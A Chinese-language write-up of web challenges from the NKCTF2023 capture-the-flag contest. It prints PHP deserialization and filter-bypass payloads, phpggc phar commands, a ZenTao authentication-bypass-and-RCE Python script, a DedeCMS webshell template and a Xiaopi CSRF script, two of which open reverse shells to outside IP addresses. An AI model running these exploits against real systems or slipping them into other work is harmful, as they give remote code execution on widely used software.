WriteUp
March 29, 2023

NKCTF2023 Web

这比赛咋说呢,两极分化很严重啊。。。。

WEB

baby_php | SOLVED | SOLVED - natro92

dir 读文件,uniq打开即可。(sort、more也行)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php
  error_reporting(0);
class Welcome{
  public $name='welcome_to_NKCTF';
  public $arg = 'oww!man!!';

  public function __destruct(){
    if($this->name == 'welcome_to_NKCTF'){
      echo $this->arg;
    }
  }
}

function waf($string){
  if(preg_match('/f|l|a|g|\*|\?/i', $string)){
    die("you are bad");
  }
}
class Happy{
  public $shell='system';
  public $cmd='cd ../../..;uniq [b-h]1[!0-9][b-z]';
  public function __invoke(){
    $shell = $this->shell;
    $cmd = $this->cmd;
    waf($cmd);
    eval($shell($cmd));
  }
}

class Hell0{
  public $func='Happy';
  public function __toString(){
    $function = $this->func;
    $function();
  }
}
$happy = new Happy();
$hello = new Hell0();
$welcome = new Welcome();
$hello->func=$happy;
$welcome->arg = $hello;
echo(serialize($welcome));

?>

WebPagetest | SOLVED | SOLVED - Boogipop

解牛魔酬宾这傻逼靶机老子
提示是WebPagetest的1day,检索过后发现AVD-2022-1474319
然后反复使用以下命令RCE:

1
2
3
4
5
6
./phpggc Monolog/RCE2 system 'id' -p phar -o testinfo.ini
#进行url编码
URLENC_PAYLOAD=$(cat /tmp/testinfo.ini | xxd -p | tr -d "\n" | sed "s#..#%&#g")#写入文件
curl -sSkig 'http://43.152.206.162/runtest.php' -d 'rkey=gadget' -d "ini=$URLENC_PAYLOAD" -o -
#触发反序列化
curl -sSkig 'http://43.152.206.162/runtest.php' -d 'rkey=phar:///var/www/html/results/gadget./testinfo.ini/foo' -d "ini=$URLENC_PAYLOAD" -o -

这里php版本需要在8.2以下,用的是phpgcc工具可以自动生成反序列化gadget,github上开源
漏洞产生点在runtest.php中存在任意文件写入,并且也可以触发phar反序列化。

Easyphp | SOLVED | SOLVED - Boogipop,natro92

脑瘫Web

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /?a=QNKCDZO&b=240610708&e=114514.1&NS[CTF.go=1 HTTP/1.1
Host: c68827f5-b783-485a-a206-0550ca863a4d.node1.yuzhian.com.cn
Content-Length: 1291
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://c68827f5-b783-485a-a206-0550ca863a4d.node1.yuzhian.com.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://nkctf.yuzhian.com.cn:8000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _ga=GA1.1.704471072.1678693729; _ga_KCSGQQ51ER=GS1.1.1679669616.8.1.1679675571.0.0.0
Connection: close

c=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&d=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&cmd=(~%8F%97%8F%96%91%99%90)(~);

最后的cmd可以用:

1
&cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

前面的随便写,cmd用的是异或绕过,卡在了NS[CTF.go这里。这里用[是因为:

在 PHP 中,变量名称中不能使用句号点(.)。 例如 $a.b 是一个不合法的变量名。因此,PHP 会自动将点替换为下划线。
除了点,一些其他字符如果出现在GET参数名中,也将会被自动替换为下划线。会被自动替换的字符列表:

1
2
3
4
5
6
7
<code>chr(32) ( ) (空格)

chr(46) (.) (点)

chr(91) ([) (中括号)

chr(128) - chr(159) (多个字符)</code>

Hardphp | SOLVED | SOLVED - Boogipop,sdegree

脑瘫web

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST / HTTP/1.1
Host: 01c3bf35-e4f8-4d56-b247-f84fe01ad5da.node1.yuzhian.com.cn
Content-Length: 248
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36
Origin: http://01c3bf35-e4f8-4d56-b247-f84fe01ad5da.node1.yuzhian.com.cn
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://01c3bf35-e4f8-4d56-b247-f84fe01ad5da.node1.yuzhian.com.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _ga=GA1.1.704471072.1678693729; _ga_KCSGQQ51ER=GS1.1.1679669616.8.1.1679679956.0.0.0
Connection: close

NKCTF=%24_%3D%28%28_%2F_%29._%29%5B_%5D%3B%24_%3D%2B%2B%24_%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__.%3D%2B%2B%24_%3B%24__.%3D%2B%2B%24_%3B%24__%3D_.%24__%3B%24%24__%5B%ff%5D%28%24%24__%5B%fe%5D%29%3B&%ff=highlight_file&%fe=/flag

ezpms| SOLVED | SOLVED - Boogipop

Zentao 1day越权+任意命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# -*- coding: UTF-8 -*-
# !/usr/bin/python

'''
权限绕过+RCE POC 伪静态传参版
禅道系统 影响版本 安全版本
开源版 17.4以下的未知版本<=version<=18.0.beta1 18.0.beta2
旗舰版 3.4以下的未知版本<=version<=4.0.beta1 4.0.beta2
企业版 7.4以下的未知版本<=version<=8.0.beta1 8.0.beta2
'''
import requests

proxies = {
    #"http": "127.0.0.1:8080",
    #"https": "127.0.0.1:8080",
}
def check(url):
    # url="http://10.211.55.3:8008"
    url1 = url+'/misc-captcha-user.html'
    # url1 = url+'/index.php?m=misc&f=captcha&sessionVar=user'#非伪静态版本按照此格式传参
    # url2 = url+'/index.php?m=block&f=printBlock&id=1&module=my'#可判断验证绕过的链接
    url3 = url + 'repo-create.html'
    url4 = url + 'repo-edit-10000-10000.html'
    headers={
        "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language":"zh-CN,zh;q=0.9",
        "Cookie":"zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
    }

    headers2 = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
        "Content-Type":"application/x-www-form-urlencoded",
        "X-Requested-With":"XMLHttpRequest",
        "Referer":url+"/repo-edit-1-0.html"
    }

    data1 = 'product%5B%5D=1&SCM=Gitlab&name=66667&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid='
    data2 = 'SCM=Subversion&client=`bash -c "bash -i >%26 /dev/tcp/114.116.119.253/7788 <%261"`'
    s=requests.session()
    try:
        req1 = s.get(url1,proxies=proxies,timeout=5,verify=False,headers=headers)
        req3 = s.post(url3,data=data1,proxies=proxies,timeout=5,verify=False,headers=headers2)
        req4 = s.post(url4,data=data2,proxies=proxies,timeout=5,verify=False,headers=headers2)
        print(req4.text)
        if 'uid=' in req4.text:
            print(url,"")
            return True
    except Exception as e:
        print(e)
    return False
if __name__ == '__main__':
    print(check("http://ee12ada9-6792-4df7-b671-06316b719ff3.node1.yuzhian.com.cn/"))

ezcms| SOLVED | Working - Boogipop

考点:织梦cms 1day后台getshell
织梦DedeCMS 0day RCE - seizer-zyx - 博客园
首先发现管理员后台:/dede/login.php admin/admin
进入管理员后台面板后按照上述文章复现
最重要的一点是,也就是shell文件的保存位置,以及文件包含漏洞触发点

首先是在模板管理的默认模板界面添加一个test模板,内容为

1
<?php "\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73"('./shell.php', "<?php eva" . "l(\$_GE" . "T[a]);");

相当于在当前文件夹put一个shell.php文件,那我们需要做的就是想办法包含这个htm文件

在单页文档管理位置添加一个页面,如下

这样就会将test.htm输入进123.php,也算一种文件包含,那么就会产生我们的shell文件
接下来先访问

然后直接在http://4e840ed5-6e1e-48fe-99f7-44ff988664bd.node2.yuzhian.com.cn/shell.php执行命令即可
这里网站的根目录就是/

xiaopi | SOLVED | Working - Boogipop

考点:小皮最近爆出来的1day
Xiaopi linux管理系统存在前台RCE和后台RCE,后台RCE是基于1 click XSS实现的,前台RCE是0 click但是这一题有bot,因此选择1 click
首先准备一下exp.js,用来触发CSRF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
function poc(){
  $.get('/service/app/tasks.php?type=task_list',{},function(data){
    var id=data.data[0].ID;
    $.post('/service/app/tasks.php?type=exec_task',{
      tid:id
    },function(res2){
        $.post('/service/app/log.php?type=clearlog',{
            
        },function(res3){},"json");
        
      
    },"json");
  },"json");
}
function save(){
  var data=new Object();
  data.task_id="";
  data.title="test";
  data.exec_cycle="1";
  data.week="1";
  data.day="3";
  data.hour="14";
  data.minute = "20";
  data.shell='bash -c "bash -i >& /dev/tcp/175.24.235.176/7777 <&1"';
  $.post('/service/app/tasks.php?type=save_shell',data,function(res){
    poc();
  },'json');
}
save();

这里会将反弹shell指令写进管理面板的计划任务,因此得以rce
还涉及一个前台绕过
加上附加头 X-Requested-With: XMLHttpRequest 即可直接绕过授权码,不需要知道授权码就可以看到登录界面
然后用户名给上XSS 的payload,起nc等待反弹shell
这个放在用户名处,然后验证码一定要正确,否则寄

About this Post

This post is written by Boogipop, licensed under CC BY-NC 4.0.

#WriteUp#CTF